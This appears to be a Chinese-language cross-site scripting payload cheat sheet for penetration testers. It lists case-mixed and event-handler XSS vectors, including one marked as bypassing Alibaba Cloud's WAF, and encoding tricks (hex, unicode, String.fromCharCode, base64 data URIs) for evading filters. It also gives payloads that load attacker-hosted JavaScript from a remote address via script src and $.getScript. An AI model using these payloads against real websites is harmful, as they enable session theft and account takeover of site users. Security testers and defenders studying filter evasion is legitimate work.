一、XSS檢測標籤

<ScRipt>ALeRt("XSS");</sCRipT>
<sc<script>ript>alert(/xss/)</script>
<img src=""onerror="alert('xss')"> 
<img/src/onerror=alert(1)> 
<img/src='a'onerror=[1].find(alert)>
<iframe onload=alert(1)>
<marquee/onstart=confirm(1)>
<details/open/ontoggle=top["al"+"ert"](1)> 谷歌瀏覽器 【繞阿里雲XSS】
<svg/onload=prompt(1)>
<style onload=alert(1)>
<body onload=prompt(1);>
<details open ontoggle=alert(1)>
 

二、編碼轉換說明

1.js程式碼轉換為\u編碼
http://www.msxindl.com/tools/unicode16.asp
2.可以將ascii碼轉換為unicode
http://www.msxindl.com/tools/unicode.asp
進而放入sublime將;去掉，把&#替換為,即可。這樣就可以使用String.fromCharCode()。
(ps：String.fromCharCode不宜過長)
3.data協議
PHNjcmlwdD5hbGVydCgnZGF0YSBwcm90b2NvbCcpPC9zY3JpcHQ+這裡Base64解碼後的結果
<script>alert('data protocol')</script>

js檔案內容使用如下編碼:
1.JS+base16編碼
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
2.unicode編碼
<img src="1"
onerror=eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0075\u006e\u0069\u0063\u006f\u0
064\u0065\u0027\u0029")></img>
3.String.fromCharCode
<IMG SRC=/ onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,10 1,39,41))"></img>
<object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnZGF0YSBwcm90b2NvbCcpPC9zY3JpcHQ+">
</object>
 

三、遠端載入js原始碼

注意:有些網站只能載入https網站的js程式碼，有些只能載入http網站的js的程式碼

<svg onload="$.getScript`http://10.0.0.225/test2.js`" stype="display:none">
<script src=http://10.0.0.225/test2.js></script>
<img src=x onerror=$.getScript('http://10.0.0.225/test2.js')>
<details ontoggle="$.getScript`http://10.0.0.225/test2.js`">123</details>（詳細資訊）
<script src="http://10.0.0.225/test2.js"></script>
 

四、XSS bypass參考文件

XSS Filter Evasion Cheat Sheet_最終版